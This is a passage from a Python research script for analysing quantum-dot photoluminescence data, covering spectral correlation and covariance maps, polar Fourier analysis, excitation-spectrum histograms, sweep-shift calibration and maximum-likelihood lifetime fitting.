spectra2\r\n spectra1mean = np.mean(spectra1,axis=1) #subtract mean of the entire series to better observe fluctuations around the mean\r\n spectra2mean = np.mean(spectra2,axis=1)\r\n \r\n spectra1corr= np.zeros(spectra1.shape)\r\n spectra2corr= np.zeros(spectra2.shape)\r\n \r\n stdev1 = np.zeros((len(taus),len(spectra1)))\r\n stdev2 = np.zeros((len(taus),len(spectra2)))\r\n \r\n for j in range(0,len(spectra1)):\r\n spectra1corr[j,:] = spectra1[j,:]-spectra1mean[j] #mean is subtracted for each wavelength specific. Note that when plotting mean subtracted spectra you can not consider the gaussian curve anymore.\r\n \r\n for j in range(0,len(spectra2)): \r\n spectra2corr[j,:] = spectra2[j,:]-spectra2mean[j]\r\n \r\n for i in tqdm(range(len(taus))):\r\n tau = taus[i]\r\n for j in range(0,len(spectra1)):\r\n # for t in range(0,len(spectra1corr[0])-tau): \r\n stdev1[i,j] = np.std(spectra1[j,0:len(spectra1corr[0])-tau]) #standard deviation is calculated for the intensities across the time direction\r\n \r\n for i in tqdm(range(len(taus))):\r\n tau = taus[i]\r\n for j in range(0,len(spectra2)):\r\n stdev2[i,j] = np.std(spectra2[j,tau:len(spectra2corr[0])])\r\n \r\n\r\n covariance = np.zeros((len(taus),len(spectra1),len(spectra2))) #saves the covariances, correlations for different taus\r\n normalization = np.zeros((len(taus),len(spectra1),len(spectra2)))\r\n correlationtemp = np.zeros((len(taus),len(spectra1),len(spectra2)))\r\n \r\n for i in tqdm(range(len(taus))):\r\n tau = taus[i]\r\n for t in range(0,len(spectra1corr[0])-tau):\r\n covariance[i] += np.outer(spectra1corr[:,t],spectra2corr[:,t+tau])\r\n \r\n normalization[i] = np.outer(stdev1[i],stdev2[i])*len(spectra1[0])\r\n correlationtemp[i] = np.divide(covariance[i],normalization[i])\r\n \r\n correlation = np.zeros((len(taus),len(spectra1),len(spectra2))) \r\n #here I use the correction for the decaying component in the spectra. Basically, due to non-overlapping stuff this creates a worse correlation than actually true. In order to circumvent that, either the data along the wavelength axes should be increased, or you have to do some correction (which are the lines below)\r\n for i in tqdm(range(len(taus))):\r\n tau = taus[i]\r\n for t in range(0,len(spectra1corr[0])-tau):\r\n correlation[i] = correlationtemp[i]/(1-tau/len(spectra1[0]))\r\n \r\n minwavspec1 = np.min(np.delete(wavelengthsspectra1.ravel(),np.where(wavelengthsspectra1.ravel()<=1))) #done to select the wavelength on the correct axis\r\n maxwavspec1 = np.max(np.delete(wavelengthsspectra1.ravel(),np.where(wavelengthsspectra1.ravel()<=1))) # I dont want to construct a map with all zeros\r\n minwavspec2 = np.min(np.delete(wavelengthsspectra2.ravel(),np.where(wavelengthsspectra2.ravel()<=1)))\r\n maxwavspec2 = np.max(np.delete(wavelengthsspectra2.ravel(),np.where(wavelengthsspectra2.ravel()<=1)))\r\n \r\n if plot=='corr': #with the string you can select which graphs you would like to see\r\n for i in range(len(taus)):\r\n tau=taus[i]\r\n # if tau==0:\r\n vmax0corr=np.nanmax(np.delete(correlation.ravel(),np.where(correlation.ravel()>=0.95))) #done to remove the whole =1 diagonal visualization and allows for better visualization of the plot\r\n # print(vmax0corr)\r\n plt.figure()\r\n plt.imshow(correlation[i],extent=[minwavspec1,maxwavspec1,maxwavspec2,minwavspec2],vmax=vmax0corr)\r\n plt.colorbar()\r\n plt.gca().invert_yaxis()\r\n plt.xlabel('Wavelength (nm)')\r\n plt.ylabel('Wavelength (nm)')\r\n plt.title('Correlation map. tau = '+str(taus[i]))\r\n # if savefig=True: #attempt to save figures on the fly\r\n # plt.savefig('E:/Martijn/ETH/results/20200310_PM111_specdiffusion/QD2/Correlation_map_tau'+str(tau)+'_excitation',dpi=800) \r\n \r\n # else:\r\n # plt.figure()\r\n # plt.imshow(correlation[i],extent=[minwavspec1,maxwavspec1,maxwavspec2,minwavspec2])\r\n # plt.colorbar()\r\n # plt.gca().invert_yaxis()\r\n # plt.xlabel('Wavelength (nm)')\r\n # plt.ylabel('Wavelength (nm)')\r\n # plt.title('Correlation map. tau = '+str(taus[i]))\r\n # if savefig=True: #attempt to save figures on the fly\r\n # plt.savefig('E:/Martijn/ETH/results/20200310_PM111_specdiffusion/QD2/Correlation_map_tau'+str(tau)+'_excitation',dpi=800) \r\n elif plot=='cov':\r\n for i in range(len(taus)):\r\n tau = taus[i]\r\n \r\n plt.figure()\r\n plt.imshow(covariance[i],extent=[minwavspec1,maxwavspec1,maxwavspec2,minwavspec2])\r\n plt.colorbar()\r\n plt.gca().invert_yaxis()\r\n plt.xlabel('Wavelength (nm)')\r\n plt.ylabel('Wavelength (nm)')\r\n plt.title('Covariance map. tau = '+str(tau))\r\n elif plot=='norm':\r\n for i in range(len(taus)):\r\n tau = taus[i]\r\n \r\n plt.figure()\r\n plt.imshow(normalization[i],extent=[minwavspec1,maxwavspec1,maxwavspec2,minwavspec2])\r\n plt.colorbar()\r\n plt.gca().invert_yaxis()\r\n plt.xlabel('Wavelength (nm)')\r\n plt.ylabel('Wavelength (nm)')\r\n plt.title('Normalization map. tau = '+str(tau)) \r\n \r\n elif plot=='all':\r\n for i in range(len(taus)):\r\n tau = taus[i]\r\n \r\n plt.figure()\r\n plt.imshow(correlation[i],extent=[minwavspec1,maxwavspec1,maxwavspec2,minwavspec2])\r\n plt.colorbar()\r\n plt.gca().invert_yaxis()\r\n plt.xlabel('Wavelength (nm)')\r\n plt.ylabel('Wavelength (nm)')\r\n plt.title('Correlation map. tau = '+str(taus[i]))\r\n \r\n for i in range(len(taus)):\r\n tau = taus[i]\r\n \r\n plt.figure()\r\n plt.imshow(covariance[i],extent=[minwavspec1,maxwavspec1,maxwavspec2,minwavspec2])\r\n plt.colorbar()\r\n plt.gca().invert_yaxis()\r\n plt.xlabel('Wavelength (nm)')\r\n plt.ylabel('Wavelength (nm)')\r\n plt.title('Covariance map. tau = '+str(tau))\r\n \r\n for i in range(len(taus)):\r\n tau = taus[i]\r\n \r\n plt.figure()\r\n plt.imshow(normalization[i],extent=[minwavspec1,maxwavspec1,maxwavspec2,minwavspec2])\r\n plt.colorbar()\r\n plt.gca().invert_yaxis()\r\n plt.xlabel('Wavelength (nm)')\r\n plt.ylabel('Wavelength (nm)')\r\n plt.title('Normalization map. tau = '+str(tau))\r\n \r\n else: #means that you dont want to see any plot\r\n pass\r\n \r\n return covariance, normalization, correlation\r\n\r\n \r\ndef wavelengthcorrelation(spectra1,spectra2,exptime):\r\n \"\"\"\r\n \r\n\r\n Parameters\r\n ----------\r\n spectra1 : Array of spectra to be correlated with spectra2. make sure that the shape of the array has wavelengths,time\r\n Array.\r\n spectra2 : Array of spectra to be correlated with spectra1. make sure that the shape of the array has wavelengths,time\r\n Array.\r\n\r\n Returns\r\n -------\r\n norm : array with intensities, correlated for the whole time range\r\n delaytime : A variable that shifts the correlation graph to almost match completely with tau=0. This can be done because the np.correlate function is to be interpeted as how similar the spectra look after a certain time\r\n\r\n \"\"\"\r\n \r\n spectra1 = spectra1.ravel()\r\n spectra2 = spectra2.ravel()\r\n spectra1norm = (spectra1 - np.mean(spectra1)) / (np.std(spectra1) * (np.sqrt(len(spectra1)-1)))\r\n spectra2norm = (spectra2 - np.mean(spectra2)) / (np.std(spectra2) * (np.sqrt(len(spectra2)-1)))\r\n covariance = np.correlate(spectra1-np.mean(spectra1),spectra2-np.mean(spectra2),mode='same')\r\n correlation = np.correlate(spectra1norm, spectra2norm,mode='same')\r\n \r\n shiftt = np.linspace(-exptime/2,exptime/2,len(spectra1))\r\n correlationcorr = np.zeros(len(correlation))\r\n \r\n for j in range(len(correlationcorr)):\r\n correlationcorr[j] = correlation[j]/(1-np.abs(shiftt[j]/exptime))\r\n \r\n return correlation, shiftt, covariance, correlationcorr\r\n\r\ndef intensitycorrelation(spectra1,spectra2,exptime):\r\n \"\"\"\r\n \r\n\r\n Parameters\r\n ----------\r\n spectra1 : Array of spectra to be correlated with spectra2. make sure that the shape of the array has wavelengths,time\r\n Array.\r\n spectra2 : Array of spectra to be correlated with spectra1. make sure that the shape of the array has wavelengths,time\r\n Array.\r\n\r\n Returns\r\n -------\r\n norm : array with intensities, correlated for the whole time range\r\n delaytime : A variable that shifts the correlation graph to almost match completely with tau=0. This can be done because the np.correlate function is to be interpeted as how similar the spectra look after a certain time\r\n spectra1sum, summed intensities without the correlation value\r\n spectra2sum, summed intensities without the correlation value\r\n \"\"\"\r\n \r\n # spectra1 = spectra1.ravel()\r\n # spectra2 = spectra2.ravel()\r\n spectra1sum = np.sum(spectra1,axis=0)\r\n spectra2sum = np.sum(spectra2,axis=0)\r\n spectra1norm = (spectra1sum - np.mean(spectra1sum)) / (np.std(spectra1sum) * (np.sqrt(len(spectra1sum)-1)))\r\n spectra2norm = (spectra2sum - np.mean(spectra2sum)) / (np.std(spectra2sum) * (np.sqrt(len(spectra2sum)-1)))\r\n covariance = np.correlate(spectra1sum - np.mean(spectra1sum),spectra2sum - np.mean(spectra2sum),mode='same')\r\n correlation = np.correlate(spectra1norm, spectra2norm,mode='same')\r\n shiftt = np.linspace(-exptime/2,exptime/2,len(spectra1[0]))\r\n correlationcorr = np.zeros(len(correlation))\r\n for j in range(len(correlationcorr)):\r\n correlationcorr[j] = correlation[j]/(1-np.abs(shiftt[j]/exptime))\r\n return correlation, shiftt, spectra1sum, spectra2sum, covariance, correlationcorr\r\n\r\n\r\ndef wavelengthaverage(wavelengths,array):\r\n \"\"\"Computes the average and find its location in the wavelength list\"\"\"\r\n #is a bit slow\r\n sum1=np.zeros(1)\r\n sum2=np.zeros(1)\r\n wavaverage=np.zeros(1)\r\n for j in range(len(array[0])): #this calculates the average wavelength depending using some kind of wavelength average\r\n for i in range(len(wavelengths)):\r\n temp = wavelengths[i]*array[i,j]\r\n sum1+=temp\r\n temp2 = array[i,j]\r\n sum2+=temp2\r\n wavaverage = sum1/sum2\r\n\r\n idx = (np.abs(wavelengths - wavaverage)).argmin()\r\n return wavaverage,idx,wavelengths[idx]\r\n\r\n\r\n\r\ndef cartesiantopolarcorrelation(cartesiandata,origin,datapoints):\r\n \"\"\"transforms cartesian data into polar data on a rectangular grid.\"\"\"\r\n #converts cartesian covariance or correlation maps to 'rolled out' radii vs theta maps\r\n if datapoints%2==0:\r\n inputdata = np.zeros((len(cartesiandata),datapoints,datapoints))\r\n thetas = np.linspace(-np.pi,np.pi,datapoints,endpoint=False)\r\n radius = np.zeros((datapoints,datapoints))\r\n theta = np.zeros((datapoints,datapoints))\r\n\r\n\r\n for i in range(datapoints): #Radius and theta are only calculated once since the spectra all have the same radii and theta, because I chose the center point to be the same for all\r\n for j in range(datapoints):\r\n radius[i,j]=((i-int(datapoints/2))**2+(j-int(datapoints/2))**2)**(1/2)\r\n theta[i,j] = np.arctan2(i-int(datapoints/2),j-int(datapoints/2)) #calculates the radii and thetas for the data set when centered around the value you are interested in\r\n \r\n maximalradius=int(np.max(radius)) \r\n indexx = np.zeros((len(cartesiandata),int(maximalradius),datapoints))\r\n indexy = np.zeros((len(cartesiandata),int(maximalradius),datapoints))\r\n radii = np.linspace(0,int(maximalradius),int(maximalradius)) \r\n polardata = np.zeros((len(inputdata),int(maximalradius),datapoints))\r\n \r\n for t in range(len(inputdata)):\r\n inputdata[t] = cartesiandata[t][origin-int(datapoints/2):origin+int(datapoints/2),origin-int(datapoints/2):origin+int(datapoints/2)]\r\n for i in range(0,int(maximalradius)): #if you are going to want sampling that has an increased value in the radius driction you should implement a for loop here\r\n \r\n indexx[t,i,:] = radii[i]*np.cos(thetas)\r\n indexy[t,i,:] = radii[i]*np.sin(thetas)\r\n \r\n # for i in range(0,int(maximalradius[t])):\r\n for k in range(datapoints):\r\n polardata[t,i,k] = cartesiandata[t][int(round(indexx[t,i,k]))+origin][int(round(indexy[t,i,k]))+origin] # basically it searches for when the index matches pretty similarly the index around the origin.\r\n # temp1 = polardata[t,i,k] = cartesiandata[t][int(indexx[t,i,k])+origin][int(indexy[t,i,k])+origin] \r\n # temp2 = polardata[t,i,k] = cartesiandata[t][int(indexx[t,i,k])+origin+1][int(indexy[t,i,k])+origin] \r\n # temp3 = polardata[t,i,k] = cartesiandata[t][int(indexx[t,i,k])+origin][int(indexy[t,i,k])+origin+1] \r\n # temp4 = polardata[t,i,k] = cartesiandata[t][int(indexx[t,i,k])+origin+1][int(indexy[t,i,k])+origin+1] \r\n # polardata[t,i,k] = np.mean([temp1,temp2,temp3,temp4]) # so with these you can basically have an average of the closes values in the data. Some figures did not show significant changes\r\n else:\r\n raise ValueError('datapoints must be a multiple of two so that it is centered around even values')\r\n \r\n \r\n \r\n return inputdata,polardata,thetas,maximalradius\r\n #so it returns inputdata that is cropped symmetricaly around the chosen origin with the number of datapoints being an input parameter\r\n\r\n\r\n\r\ndef fouriertransform(polardata,thetas):\r\n #works based on thefunction cartesian to polar converting\r\n #in the script some exampls were given\r\n if polardata.ndim==2: #this \r\n #this function works when the total amount of sampling points on the inner radius is the same as on the outer radius. This does not work when its not because the array then either gets distorted or you have a lot of zeros which may mess up the FT.\r\n \r\n fouriertaudata = [] # in order to retain the imaginary part the data must be calculted in a list. The data is then transformed to an array\r\n fouriertautheta = np.zeros(polardata.shape)\r\n \r\n \r\n for i in range(len(polardata)): #thus does it for all taus\r\n # datapoints = len(polardata[0][i])\r\n datapoints = len(thetas)\r\n fouriertransformdata = []\r\n # for j in range(len(polardata[i])):\r\n # fourtemp = fftpack.fft(polardata[i,:])\r\n fourtemp = fftpack.fft(polardata[i,:])/datapoints #is a normalization factor\r\n fouriertransformdata.append(fourtemp)\r\n # fouriertransformdataarr = np.asarray(fouriertransformdata)\r\n fouriertautheta[i,:] = fftpack.fftfreq(datapoints) * (datapoints)\r\n \r\n fouriertaudata.append(fouriertransformdata)\r\n \r\n fouriertaudata = np.asarray(fouriertaudata)\r\n \r\n fouriertauthetafftshift = np.zeros(polardata.shape)\r\n fouriertaudatarealfftshift = np.zeros(polardata.shape)\r\n fouriertaudataimagfftshift = np.zeros(polardata.shape)\r\n \r\n for i in range(len(polardata)):\r\n # for j in range(len(polardata[i])):\r\n fouriertauthetafftshift[i] = np.fft.fftshift(fouriertautheta[i])\r\n fouriertaudatarealfftshift[i] = np.fft.fftshift(fouriertaudata[i].real)\r\n fouriertaudataimagfftshift[i] = np.fft.fftshift(fouriertaudata[i].imag)\r\n \r\n \r\n elif polardata.ndim==3:\r\n #this function works when the total amount of sampling points on the inner radius is the same as on the outer radius. This does not work when its not because the array then either gets distorted or you have a lot of zeros which may mess up the FT.\r\n \r\n fouriertaudata = [] # in order to retain the imaginary part the data must be calculted in a list. The data is then transformed to an array\r\n fouriertautheta = np.zeros(polardata.shape)\r\n \r\n \r\n for i in range(len(polardata)): #thus does it for all taus\r\n # datapoints = len(polardata[0][i])\r\n datapoints = len(thetas)\r\n fouriertransformdata = []\r\n for j in range(len(polardata[i])):\r\n # fourtemp = fftpack.fft(polardata[i,j,:])\r\n fourtemp = fftpack.fft(polardata[i,j,:])/datapoints #is a normalization factor\r\n fouriertransformdata.append(fourtemp)\r\n # fouriertransformdataarr = np.asarray(fouriertransformdata)\r\n fouriertautheta[i,j,:] = fftpack.fftfreq(datapoints) * (datapoints)\r\n \r\n fouriertaudata.append(fouriertransformdata)\r\n \r\n fouriertaudata = np.asarray(fouriertaudata)\r\n \r\n fouriertauthetafftshift = np.zeros(polardata.shape)\r\n fouriertaudatarealfftshift = np.zeros(polardata.shape)\r\n fouriertaudataimagfftshift = np.zeros(polardata.shape)\r\n \r\n for i in range(len(polardata)):\r\n for j in range(len(polardata[i])):\r\n fouriertauthetafftshift[i,j] = np.fft.fftshift(fouriertautheta[i,j])\r\n fouriertaudatarealfftshift[i,j] = np.fft.fftshift(fouriertaudata[i,j].real)\r\n fouriertaudataimagfftshift[i,j] = np.fft.fftshift(fouriertaudata[i,j].imag)\r\n \r\n return fouriertautheta, fouriertaudata,fouriertauthetafftshift, fouriertaudatarealfftshift,fouriertaudataimagfftshift\r\n\r\n\r\n\r\ndef wienerprocess(centerstart,scaling,length):\r\n #wiener process is defined in the sense that brownian motion makes independent gaussian steps at each point. The cumulative sum of independent normal random varaibles represents brownian motion.\r\n x = centerstart+scaling*np.cumsum(np.random.randn(length)) \r\n # y = centerstart+scaling*np.cumsum(np.random.randn(length))\r\n return x\r\n\r\ndef find_origin(normalizationdata,guessorigin,wavelengths,prominence=10,width=15):\r\n #might have to play a little with prominence and width due to trion peak\r\n temp = np.sum(normalizationdata,axis=0)\r\n peaks,rest= scipy.signal.find_peaks(temp,width=width,prominence=prominence)\r\n minimalvalue = np.argmin(np.abs(wavelengths[peaks]-guessorigin))\r\n peakprominent = peaks[minimalvalue]\r\n return peakprominent,peaks\r\n\r\ndef Fouriercomponentvstau(fourierdata, fourierangles, selectedradii):\r\n #less of a mess in script when components are matched\r\n component1theta = np.zeros((len(fourierdata),len(selectedradii)))\r\n component1data = np.zeros((len(fourierdata),len(selectedradii)))\r\n component2theta = np.zeros((len(fourierdata),len(selectedradii)))\r\n component2data = np.zeros((len(fourierdata),len(selectedradii)))\r\n component3theta = np.zeros((len(fourierdata),len(selectedradii)))\r\n component3data = np.zeros((len(fourierdata),len(selectedradii))) \r\n for i in range(len(fourierdata)):\r\n for k in range(0,len(selectedradii)):\r\n selectedradius=selectedradii[k]\r\n for j in range(len(fourierdata[0][0])):\r\n if fourierangles[i][k][j]==0:\r\n \r\n component1theta[i][k]= fourierangles[i][selectedradius][j]\r\n component1data[i][k] = fourierdata[i][selectedradius][j]\r\n \r\n elif fourierangles[i][k][j]==1:\r\n \r\n component2theta[i][k] = fourierangles[i][selectedradius][j]\r\n component2data[i][k] = fourierdata[i][selectedradius][j]\r\n \r\n elif fourierangles[i][k][j]==2: # I think this one is the most interesting for the imaginairy part.\r\n \r\n component3theta[i][k] = fourierangles[i][selectedradius][j]\r\n component3data[i][k] = fourierdata[i][selectedradius][j]\r\n return component1theta,component1data,component2theta,component2data,component3theta,component3data\r\n \r\ndef find_originsyntheticdata(normalizationdata,guessorigin,wavelengths,prominence=10,width=15):\r\n #due to non amplitude fluctuations which are a little bit random and therefore hard to simulate it actually is the other way around\r\n temp = np.sum(-normalizationdata,axis=0)\r\n peaks,rest= scipy.signal.find_peaks(temp,width=width,prominence=prominence)\r\n minimalvalue = np.argmin(np.abs(wavelengths[peaks]-guessorigin))\r\n peakprominent = peaks[minimalvalue]\r\n return peakprominent,peaks\r\n\r\ndef ljungbox(h,correlations,lags):\r\n #a measure of how intense the autocorrelation values are compared to the standarad deviations\r\n length = len(correlations)\r\n for i in range(h):\r\n temp = correlations[i]**2/(length-lags[i])\r\n sum1 = np.sum(temp) \r\n return sum1\r\n\r\ndef pearsoncorrelation1D(mean):\r\n #mean subtraction of fitted peak maxima. Generates normalized correlations and the 95% confidence interval\r\n mean =mean.ravel()\r\n meansub = mean-np.mean(mean)\r\n corr = np.correlate(meansub,meansub,mode='same')\r\n stdev = np.std(mean)\r\n normcorr = corr/stdev**2/len(mean)\r\n delaytau=np.linspace(-len(mean)/2,len(mean)/2,len(mean))\r\n return normcorr, corr, stdev*2/len(mean)**(1/2),delaytau-0.5\r\n\r\n\r\n# Numba approach\r\ndef repeatvector(vecin,repeattimes):\r\n return np.repeat(vecin,repeattimes) \r\n\r\n#% Parallel Loops\r\ndef repeatvecparallel(k):\r\n return(np.matlib.repmat(calibcoeffs[1]+InVoltage(data[19][range(data[22][k+tau],data[22][k+tau+1]-1)]*dtmacro,Freq,Vpp,Voffset,Verror)*calibcoeffs[0],len(data[22])-tau,1))\r\n\r\ndef histogramexcitationspectra(Freq,Vpp,Voffset,tshift,calibcoeffs,dtmacro,rawdata,originaldata,wavelengthrange,histogram):\r\n#rawdata is the firstphoton of each cycle of interest.Original data is used to not cover more photons when the emission wavelength does not match.\r\n#selecteddata is the index of the ones interested in the firstphotons listed\r\n#originaldata is all the photons collected\r\n \r\n binnedintensities = np.zeros((histogram,len(rawdata)))\r\n binnedwavelengths = np.zeros((histogram,len(rawdata)))\r\n \r\n for i in range(len(rawdata)-1):\r\n originaldataphotonlistindex = np.argmin(np.abs(rawdata-rawdata[i]))\r\n [intensitiestemp,wavelengthstemp] = np.histogram(InVoltagenew_c(dtmacro*originaldata[rawdata[i]:rawdata[originaldataphotonlistindex+1]],Freq,Vpp,Voffset,tshift)*calibcoeffs[0]+calibcoeffs[1],histogram,range=wavelengthrange)\r\n wavelengthstempavg = (wavelengthstemp[:-1]+0.5*(wavelengthstemp[1]-wavelengthstemp[0]))\r\n binnedwavelengths[:,i]= wavelengthstempavg\r\n binnedintensities[:,i]=intensitiestemp\r\n \r\n \r\n return binnedintensities,binnedwavelengths\r\n\r\n\r\ndef histogramexcitationspectranew(Freq,Vpp,Voffset,tshift,calibcoeffs,dtmacro,rawdata,selecteddata,originaldata,wavelengthrange,histogram):\r\n#rawdata is the firstphoton of each cycle of interest.Original data is used to not cover more photons when the emission wavelength does not match.\r\n#selecteddata is the index of the ones interested in the firstphotons listed\r\n#originaldata is all the photons collected\r\n \r\n binnedintensities = np.zeros((histogram,len(rawdata)))\r\n binnedwavelengths = np.zeros((histogram,len(rawdata)))\r\n \r\n for i in range(len(rawdata)-1):\r\n originaldataphotonlistindex = np.argmin(np.abs(selecteddata-rawdata[i]))\r\n [intensitiestemp,wavelengthstemp] = np.histogram(InVoltagenew_c(dtmacro*originaldata[rawdata[i]:selecteddata[originaldataphotonlistindex+1]],Freq,Vpp,Voffset,tshift)*calibcoeffs[0]+calibcoeffs[1],histogram,range=wavelengthrange)\r\n wavelengthstempavg = (wavelengthstemp[:-1]+0.5*(wavelengthstemp[1]-wavelengthstemp[0]))\r\n binnedwavelengths[:,i]= wavelengthstempavg\r\n binnedintensities[:,i]=intensitiestemp\r\n \r\n \r\n return binnedintensities,binnedwavelengths\r\n#from here on functions I just copied from your functions file but just ran smoother when defined some differences for my pc\r\n \r\n#I defined involtage different with np logical instead of scipy logcial because I got errors all the time. Same then holds for Fintshift\r\ndef InVoltage(t,Freq,VPP,VOffset,Verror):\r\n Period=1/Freq\r\n Bool1=t<=Period/4\r\n Bool2=np.logical_and(t>Period/4,t<=3*Period/4)\r\n Bool3=t>3*Period/4\r\n InVoltage=(VPP/2*t/(Period/4)+VOffset-Verror)*Bool1+(VPP/2-VPP/2*(t-Period/4)/(Period/4)+VOffset+Verror)*Bool2+(-VPP/2+VPP/2*(t-3*Period/4)/(Period/4)+VOffset-Verror)*Bool3\r\n return(InVoltage)\r\n\r\ndef InVoltagenew(t,Freq,VPP,VOffset,tshift):\r\n Period=1/Freq\r\n t=t+tshift\r\n Bool1=t<=Period/4\r\n Bool2=np.logical_and(t>Period/4,t<=3*Period/4)\r\n Bool3=t>3*Period/4\r\n InVoltage=(VPP/2*t/(Period/4)+VOffset)*Bool1+(VPP/2-VPP/2*(t-Period/4)/(Period/4)+VOffset)*Bool2+(-VPP/2+VPP/2*(t-3*Period/4)/(Period/4)+VOffset)*Bool3\r\n return(InVoltage)\r\n\r\nInVoltagenew_c=nb.jit(nopython=True)(InVoltagenew)\r\n\r\ndef Findtshift(Freq,Vpp,Voffset,calibcoeffs,macrocyclelist,dtmacro,matchrange=(500,570),shiftrange=(-6e-4,-2e-4), histbinnumber = 100,steps=30,Debugmode=False):\r\n InVoltagenew_c=nb.jit(nopython=True)(InVoltagenew) #compile to C to speed it up\r\n threshlow=1/Freq/4\r\n threshhigh=3/Freq/4\r\n #Sort microtimes in two halves\r\n Z = np.logical_and(threshlow<(macrocyclelist*dtmacro),(macrocyclelist*dtmacro)<= threshhigh)\r\n tforward=macrocyclelist[np.where(Z)]\r\n tbackward=macrocyclelist[np.where(np.logical_not(Z))]\r\n # histbinnumber = 100 # 608 was for the entire range. For a matchrange of 520 to 590, this should be 4 times as small than the original to prevent aliasing\r\n #First coarse sweep\r\n # matchrange=(500, 570) #Wavelengthrange in which it should match. Maybe exclude the boundaries a bit\r\n tshift=np.zeros(steps)\r\n autocorr=np.zeros(steps)\r\n for k in tqdm(range(0,steps)):\r\n tshift[k]=shiftrange[0]+(shiftrange[1]-shiftrange[0])*k/steps\r\n lamforward=calibcoeffs[1]+InVoltagenew_c(tforward*dtmacro,Freq,Vpp,Voffset,tshift[k])*calibcoeffs[0]\r\n lambackward=calibcoeffs[1]+InVoltagenew_c(tbackward*dtmacro,Freq,Vpp,Voffset,tshift[k])*calibcoeffs[0]\r\n [ylistforward,xlistforward] = np.histogram(lamforward,histbinnumber,range=matchrange)\r\n # tlistforward = (xlistforward[:-1]+0.5*(xlistforward[1]-xlistforward[0]))\r\n [ylistbackward,xlistbackward] = np.histogram(lambackward,histbinnumber,range=matchrange)\r\n # tlistbackward = (xlistbackward[:-1]+0.5*(xlistbackward[1]-xlistbackward[0]))\r\n autocorr[k]=np.sum(ylistforward*ylistbackward)\r\n if Debugmode==True:\r\n plt.figure()\r\n plt.plot(tshift,autocorr,'.')\r\n optimumshift=tshift[np.argmax(autocorr)]\r\n if Debugmode==True:\r\n tshifttest=optimumshift\r\n lamforward=calibcoeffs[1]+InVoltagenew(tforward*dtmacro,Freq,Vpp,Voffset,tshifttest)*calibcoeffs[0]\r\n lambackward=calibcoeffs[1]+InVoltagenew(tbackward*dtmacro,Freq,Vpp,Voffset,tshifttest)*calibcoeffs[0]\r\n [ylistforward,xlistforward] = np.histogram(lamforward,histbinnumber,range=matchrange)\r\n tlistforward = (xlistforward[:-1]+0.5*(xlistforward[1]-xlistforward[0]))\r\n [ylistbackward,xlistbackward] = np.histogram(lambackward,histbinnumber,range=matchrange)\r\n tlistbackward = (xlistbackward[:-1]+0.5*(xlistbackward[1]-xlistbackward[0]))\r\n plt.figure()\r\n plt.plot(tlistforward,ylistforward,label='Forward sweep')\r\n plt.xlabel('Wavelength (nm)')\r\n plt.ylabel('Intensity')\r\n plt.title('Aligned sweeps')\r\n plt.plot(tlistbackward,ylistbackward,label='Backward sweep')\r\n plt.legend()\r\n return optimumshift\r\n\r\ndef MaxLikelihoodFunction(params,xdata,ydata,const,expterms): \r\n # max likelihood function for A*exp(-t/tau), needed in function MakLikelihoodFit\r\n # params = [A,tau]\r\n A = params[0:expterms]\r\n tau = params[expterms:2*expterms]\r\n model = const*np.ones(len(xdata))\r\n for k in range(len(A)):\r\n # print(A[k])\r\n # print(xdata)\r\n model+=A[k]*np.exp(-(xdata-xdata[0])/tau[k])\r\n # # model = A1*np.exp(-(xdata-xdata[0])/tau1)+const\r\n model [model <= 0] = 1e-10\r\n# # A2 = params[2]\r\n# # tau2 = params[2]\r\n E = 0;\r\n for i in range(len(xdata)):\r\n# # # E = E + ydata[i]*np.log(A1*np.exp(-(xdata[i]-xdata[0])/tau1)+A2*np.exp(-(xdata[i]-xdata[0])/tau2)+const)-(A1*np.exp(-(xdata[i]-xdata[0])/tau1)+A2*np.exp(-(xdata[i]-xdata[0])/tau2)+const)\r\n# # # E = E + ydata[i]*np.log(A1*np.exp(-(xdata[i]-xdata[0])/tau1)+const)-(A1*np.exp(-(xdata[i]-xdata[0])/tau1)+const)\r\n E = E + ydata[i]*np.log(model[i])-(model[i])\r\n return(-E) # This function needs to be MINIMIZED (because of the minus sign) to have the maximum likelihood fit!\r\nMaxLikelihoodFunction_c = nb.jit(nopython=True)(MaxLikelihoodFunction)\r\n\r\n\r\ndef GetLifetime(microtimes,dtmicro,dtmacro,dtfit,tstart=-1,histbinmultiplier=1,ybg=0,plotbool=False,method='ML',expterms=1): \r\n # microtimes = microtimes array with photon events\r\n # dtfit is the time interval considered for the fit [s], tstart [s] is the starting point of the fit within the histogram. If set to -1 it starts at the time with the highest intensity.\r\n # histbinmultiplier is a multiplier. actual binwidth is given as histbinmultiplier*dtmicro[s]\r\n # ybg is the background considered for the fit (CHECK UNITS!!). If set to -1 --> try to estimate background based on last bins. set to 0 --> no background subtraction\r\n # plotbool: plot histogram with fit\r\n# print('Chosen method is:' + method)\r\n [ylist,xlist] = np.histogram(microtimes,int(dtmacro/(dtmicro*histbinmultiplier)),[0,int(dtmacro/dtmicro)])\r\n tlist = (xlist[:-1]+0.5*(xlist[1]-xlist[0]))*dtmicro*1e9\r\n# print(histbinmultiplier)\r\n istart = int(tstart/dtmicro) #find index of maximum element in ylist\r\n if istart < 0:\r\n istart = ylist.argmax()\r\n iend = istart + int(dtfit/(dtmicro*histbinmultiplier))\r\n if iend>len(tlist):\r\n iend = len(tlist) \r\n \r\n # get background (by simply looking at last ten data points) and substract from intensity data.\r\n if ybg < 0:\r\n ybg = np.mean(ylist[-100:]) # mean background per histogram bin bin of length\r\n \r\n if method == 'ML': #maximum likelihood exponential fit\r\n [tau1fit,A1fit] = MaxLikelihoodFit(tlist,ylist,istart,iend,ybg,False,expterms)\r\n elif method == 'ML_c': #maximum likelihood exponential fit\r\n [tau1fit,A1fit] = MaxLikelihoodFit_c(tlist,ylist,istart,iend,ybg,False,expterms)\r\n elif method == 'WLS': # weighted least squares fit\r\n [taufit,Afit] = WeightedLeastSquareFit(tlist,ylist,istart,iend,ybg,plotbool=False)\r\n else:\r\n taufit = 0; Afit = 0;\r\n print('Error: invalid fit method')\r\n \r\n if plotbool == True:\r\n plt.xlabel('time (ns)')\r\n plt.ylabel('')\r\n plt.semilogy(tlist,ylist,'.',tlist[istart:iend],np.sum(np.array([A1fit[k]*np.exp(-(tlist[istart:iend]-tlist[istart])/tau1fit[k])+ybg*(k<1) for k in range(expterms)]),0))\r\n plt.semilogy([tlist[0],tlist[-1]],[ybg,ybg],'k--')\r\n plt.show()\r\n print('Fitted lifetime:',tau1fit,'ns; Amax:',A1fit)\r\n\r\n\r\n # if plotbool == True:\r\n # # yest = np.array([Aest[k]*np.exp(-(xdata[i]-xdata[0])/tauest[k])+bgcpb for i in range(len(xdata))])\r\n # yest = 